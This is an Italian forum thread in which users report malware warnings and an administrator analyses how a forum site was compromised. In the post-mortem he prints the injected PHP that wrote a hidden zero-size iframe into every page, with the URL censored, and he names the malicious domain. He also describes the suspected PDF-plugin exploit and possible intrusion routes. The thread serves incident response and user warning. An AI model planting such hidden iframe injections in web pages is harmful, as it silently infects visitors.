Ho cancellato la cache ma non e cambiato nulla continuo a ricevere la stessa segnalazione ogni volta che cambio pagina o aggiorno il Forum, capisco perché tu voglia chiudere il Forum, ma da quello che ho capito non puoi fare molto fino al ritorno di Marco,e io sono l’unico qui che a questo problema e mi sembra di capire che nessuno vorrebbe che chiuda il Forum me compreso.
Io uso ubuntu 9.04 con Firefox (Shiretoko) 3.5.3pre e anche Chromium 4.0.202.0. Da Firefox non mi accorgo di nulla, mentre da Chromium mi segnala il sito come pericoloso. Il che significa solamente che è inserito nelle liste di siti malevoli. In “locale” non mi accorgo di nulla…
Ti mando un PM.
Anch’io continuo ad avere messaggi di avvertimento malware con Chrome. Nessun messaggio invece con IE8
Trovato la parte di codice modificata.
Resta da capire come ci sia finita li’. Infami.
Hanno hackato SMF? O il provider hosting?
Ombelix, ricevi ancora segnalazioni?
Anche io, usando Safari sul mac, ricevo questa segnalazione, pagina per pagina. Una bella rottura.
Salute e Latinum per tutti !
Io sono riuscito ad entrare adesso, dopo aver fatto una scansione totale sul PC e aver svuotato la cache, spero che i problemi siano finiti!
Grazie a Michael per la pazienza e il suo lavoro!
No ,penso che il problema sia risolto 
Mi associo grazie per la pazienza
opss
dopo una giornata dove le segnalazioni erano sempre presenti mi sono collegato ora e il problema sembra risolto. speriamo. io uso chrome
Complimenti Mike… 
Ah,pensavo di essere solo io ad avere problemi per qualche errore sul mio pc:è da giorni che il mio antivirus Kaspersky mi blocca l’accesso al forum,adesso funziona tutto.
Giusto per la cronaca, come si sarebbe presentato l’ “attacco”? Si apriva un altro sito e ti chiedeva di scaricare qualcosa o era tutto molto più “silenzioso” (e pericoloso)?
Poi è stato interessante vedere, a grandi linee e senza tenere conto di molti fattori, quali siano i browser / antivirus / sistemi operativi più “sicuri”… 
Per esempio il mio Firefox non si è accorto di nulla, mentre Chromium mi segnalava il sito come sospetto, nonostante, a quel che so, utilizzino le stesse blacklist!
IE8 non si accorgeva di nulla, mentre Chrome si In Windows XP sp2). Se il malware faceva qualcosa, lo faceva silenziosamente.
5 minuti fa all’avvio del pc mi sono di nuovo ritrovato con un avviso del firewall di windows che era disattivato. Michael, sai dirci di preciso a cosa mirava quel codice malevolo? Penso che mi abbia mollato qualcosa di residente sul pc, ma nessuna scansione antivirus/antispyware mi rileva niente; per ora brancolo nel buio.
P. S. Ieri avevo segnalato anche un problema con AVG, ma era una coincidenza: colpa di un update buggato da parte loro. Il problema del firewall però è tutto mio.
Anche io non ho ricevuto nessun avviso da Explorer , al contrario Norton mi regalava un attacco.
Un piccolo aggiornamento che spero risponda alle domande di tutti.
Scendo nel tecnico in alcuni punti perche’ so che alcuni di voi se ne intendono.
In fondo ci sono considerazioni in linguaggio comprensibile per tutti.
< Techno babble >
L’“infezione,” lato forum, era rappresentata da un piccolo pezzetto di codice PHP che inseriva codice javascript nelle pagine
echo "<Script Language='Javascript'>
<!--
document.write(unescape('<iframe src="CENSURA CENSURA CENSURA" style="border:0px #FFFFFF none;"
name="ajax" scrolling="no" frameborder="0" marginheight="0px" marginwidth="0px" height="0px"
width="0px"></iframe>'));
//-->
</Script>";
(EDIT: ho inserito il codice “codificato”, ma qualche funzione nel sistema di scrittura post del forum me l’ha decodificato…credevo che il tag “code” l’avrebbe protetto. Beh, ho rimosso l’indirizzo pericoloso, anche se è disabilitato. Sappiate che al posto di quell’iframe c’era una sewquenza di caratteri di escape, che non posso scrivere, neanche per esempio, senza che il forum mi tronchi il post…)
Il fatto che fosse “codificato” spiega perchè, ad una ricerca “ovvia” del nome del dominio dal quale proveniva il malware (governmetfunding .net - non andateci) non appariva nulla.
Quello che è meno “perdonabile” è che nonostante avessi aperto quel file mi sia fatto sfuggire una stringa cosi’ ovvia. Grida veramente “guardami”.
A mia discolpa, l’hanno nascosta in un commento html, quindi il visualizzatore di sorgente la colorava come un commento. Ci sono cascato.
La “decodifica” di quella stringa genera codice HTML per un “iframe”, nascosto.
Questo iframe chiama un file index.php sul dominio sopra riportato.
Io non ho, mai volontariamente scaricato quel file, ma dal comportamento descritto da alcuni di voi (e descritto in attacchi simili-ma non identici - di cui ho letto in giro) devo pensare che il file inviasse un file PDF malizioso che tentava di sfruttare una falla nel plugin di Acrobat Reader.
Chi ha ricevuto errori da tale plugin (impossibile avviare…ecc ecc) è molto probabile che abbia eseguito del codice malevolo, dal comportamento sconosciuto. Con tutta probabilità il solito codice residente che trasforma il pc in un drone, con il quale effettuare attacchi come quello visto la settimana scorsa, ai danni di Twitter e Facebook.
I file sicuramente modificati sono 2, uno per ogni “tema” grafico del forum.
Considerazioni sulle segnalazioni:
Gli avvisi di malware degli antivirus sono chiaramente “realtime”. Partono quando ricevono il virus.
Molti (ma non tutti) i provider bloccano l’accesso ai domini “dispensatori” di virus, ed ecco spiegato perche’ ALCUNI di voi non hanno avuto altre avvisaglie dagli antivirus da qualche giorno a questa parte, mentre altri si.
L’avviso di Safari, Chrome e di ALCUNE build di Firefox - così come credo alcuni Firewall - invece si basano sulle liste di domini compilate da Google (e altri?). Si attivano quando il browser cerca di collegarsi al sito incriminato.
FA.it non è mai stato in queste liste, ma al momento di caricare quell’iframe il browser segnalava il pericolo.
Chrome indicava giustamente che FA.it conteneva oggetti provenienti dal sito incriminato, non che era pericoloso di per se.
Il bello di questo è che una volta rimosso il codice nel nostro forum, non c’e’ stato bisogno di chiedere la rimozione da alcuna lista.
Ora si potrebbe discutere sul “come” è arrivato quel codice nelle nostre pagine - questo è MOLTO importante, in quanto io al momento non ho corretto nulla.:
4 ipotesi:
- Exploit di SMF. Ad ora il team di SMF non è al corrente di alcuna vulnerabilità nell’ultima versione (2.0 RC1-2) del motore. Non sono in grado di fornire informazioni utile a far loro capire se il nostro potrebbe essere un caso.
- Exploit di uno degli altri prodotti PHP installati sul nostro spazio web: 2 blog, script php per “usi nostri”…
- Intrusione sui sistemi dell’hosting provider.
- Furto delle password FTP
Ritengo più probabile la 1 perchè “automatizzabile”.
Gli altri passaggi richiederebbero una fase “intelligente”, una volta guadagnato l’accesso, per decidere dove piazzare il codice malevolo.
Ok, ci sono dei “sottoinsiemi” comuni (infettare tutti gli SMF, i Wordpress, ecc ecc) ma non so…
La maggior parte di queste infezioni si fa con script automatici, ed e’ piu’ “facile” passare dal lato applicativo, che da quello del sistema operativo, o rubando delle password. L’obiettivo di solito e’ massimizzare le infezioni per creare botnet di MIGLIAIA, possibilmente MILIONI di host. Difficile da fare infettando a mano un server alla volta…
Anche se, sul forum di supporto di SMF, mi hanno parlato di un attacco simile che sfruttava un keylogger per carpire le password FTP e successivamente infettare i siti. Se solo avessimo accesso ai log del provider…
Io uso solo Mac e Linux (almeno per lavorare al forum, non per consultarlo) ma devo aver caricato un file da un PC windows, che sto scansionando (remotamente, è a casa dei miei )…
Anche Marco ha un pc “candidato” che controllerà al suo rientro.
Il mio PC al lavoro (win) è probabilmente infetto (ho aperto il forum la scorsa settimana, ho un plugin pdf, non ho un antivirus (!), ho da poco accesso amministratore per poterlo installare). Domani vedo se trovo qualcosa e userò i risultati di questa analisi per consigliare una strategia di rimozione per tutti gli utenti. In pratica SPERO che sia infetto
Lavoro in un posto che dovrebbe controllare queste cose, ma sapete, commessa esterna, tanta liberta’…
Provvederò stasera a cambiare le password da una macchina “pulita”.
E’ difficile spiegare la sensazione di insicurezza in questo caso pero’.
Immaginatevi di trovare la porta aperta, un gran disordine in casa e qualcosa di illegale. Voi vi sbarazzate della cosa illegale, mettete in ordine e chiudete la porta…ma vi resta il dubbio: come l’hanno aperta? Hanno la chiave? C’e’ un trucco per aprirla? Possono farlo ancora?
< / Techno babble >
------ Considerazioni valide per tutti:
A parte che mirava ad un plugin per visualizzare i PDF nel browser, non sappiamo nulla sul malware diffuso da quel sito tramite FA.it.
Stiamo continuando a ricercare informazioni, magari per fornire un tool di scansione e rimozione mirato (a volte i produttori antivirus li fanno).
In ogni pagina del forum veniva nascosto una finestra invisibile che scaricava qualcosa di sconosciuto da un sito, ora irraggiungibile.
Se usate Windows e avete visitato il forum nell’ultimo mese (parliamo di circa 15 mila visite - limitandosi a windows…) potenzialmente siete stati infettati.
Attenzione, vale lo stesso per migliaia di altri siti. Ci tengo a precisare che non c’è stata incuria da parte nostra, può capitare a tutti.
Munitevi di un buon antivirus (Avira, tra quelli gratuiti, pare rilevare il virus…) e controllate il vostro sistema. Questo dovrebbe valere sempre.
Non è più come 10 anni fa quando bastava stare attenti a cosa si apriva nelle email. Ora gli attacker sfruttano bug nei plugin, basta LETTERALMENTE visitare una pagina, magari di un sito “amico”.
Non importa quanto “smaliziati” siete. Un antivirus, e magari un personal firewall, se usate windows e D’OBBLIGO, e ve lo dico da informatico.
(ah, evito di commentare le 318 visite provenienti da Windows 98 nell’ultimo mese e L’UNICA visita proveniente da Windows ME… - AGGIORNATE IL VOSTRO SISTEMA)
Alcuni commentatori sembravano escludere che quegli attacchi a Twitter e Facebook provenissero da botnet, ma non vedo in che altro modo avrebbero potuto compierli.
Il team di SMF è stato informato del nostro attacco?
Ottimo lavoro.
Paolo Amoroso
Si, ed ha partecipato attivamente (tramite utenti volontari e sviluppatori sul loro forum) a ricercare ed analizzare l’incidente.
Un supporto professionale per un prodotto fondamentalmente gratuito. Chapeaux.